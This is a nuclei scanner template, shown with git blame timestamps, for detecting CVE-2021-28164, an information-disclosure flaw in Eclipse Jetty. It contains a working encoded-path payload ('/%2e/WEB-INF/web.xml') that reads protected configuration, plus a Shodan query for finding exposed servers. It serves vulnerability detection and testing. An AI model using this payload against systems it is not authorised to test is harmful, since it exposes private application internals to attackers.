nuclei-templates/http/cves/2021/CVE-2021-28164.yaml

62 lines
2.5 KiB
YAML
Raw Permalink Normal View History

2021-06-09 09:07:40 +00:00
id: CVE-2021-28164
2021-06-09 06:07:03 +00:00
info:
name: Eclipse Jetty - Information Disclosure
2021-06-09 06:07:03 +00:00
author: noamrathaus
2021-06-24 18:35:59 +00:00
severity: medium
2021-06-09 06:07:03 +00:00
description: |
Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224 is susceptible to improper authorization. The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. An attacker can access sensitive information regarding the implementation of a web application.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can exploit this vulnerability to access sensitive information, potentially leading to further attacks or unauthorized access.
2023-09-06 12:09:01 +00:00
remediation: |
Apply the latest security patches or updates provided by the Eclipse Jetty project to fix the information disclosure vulnerability.
reference:
2021-06-09 09:08:12 +00:00
- https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5
2021-06-24 18:24:29 +00:00
- https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty
- https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E
- http://packetstormsecurity.com/files/164590/Jetty-9.4.37.v20210219-Information-Disclosure.html
- https://nvd.nist.gov/vuln/detail/cve-2021-28164
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-28164
cwe-id: CWE-200,NVD-CWE-Other
2024-05-31 19:23:20 +00:00
epss-score: 0.04765
epss-percentile: 0.92672
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:eclipse:jetty:9.4.37:20210219:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: eclipse
product: jetty
2024-05-31 19:23:20 +00:00
shodan-query: cpe:"cpe:2.3:a:eclipse:jetty"
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,packetstorm,vulhub,jetty,exposure,eclipse
2024-01-14 09:27:42 +00:00
flow: http(1) && http(2)
http:
2021-06-09 06:07:03 +00:00
- method: GET
path:
2023-11-06 07:20:52 +00:00
- "{{BaseURL}}/WEB-INF/web.xml"
2021-06-09 06:07:03 +00:00
matchers:
2023-11-07 07:04:06 +00:00
- type: dsl
2024-01-10 14:07:36 +00:00
internal: true
2023-11-07 07:04:06 +00:00
dsl:
2023-11-09 11:08:45 +00:00
- "!contains_all(body, '</web-app>', 'java.sun.com')"
- "!contains_all(header, 'application/xml')"
2023-11-07 07:04:06 +00:00
- "status_code != 200"
- "status_code != 404"
2021-06-24 18:35:59 +00:00
condition: and
2021-06-09 09:07:40 +00:00
2021-06-09 06:07:03 +00:00
- method: GET
path:
2021-06-24 18:24:29 +00:00
- "{{BaseURL}}/%2e/WEB-INF/web.xml"
2023-07-11 19:49:27 +00:00
2021-06-09 06:07:03 +00:00
matchers-condition: and
matchers:
2023-11-07 07:04:06 +00:00
- type: dsl
dsl:
- "contains_all(body, '</web-app>', 'java.sun.com')"
- "contains_all(header, 'application/xml')"
- "status_code == 200"
condition: and
# digest: 4a0a004730450220117503778b9e94f80db0303e254c6238a929f122689d99b761826065c7a27c03022100f7c4124b95489c9b6397548b504fde7a2fc3d8006995f0b15a8e31cff1ebd1eb:922c64590222798bb761d5b6d8e72950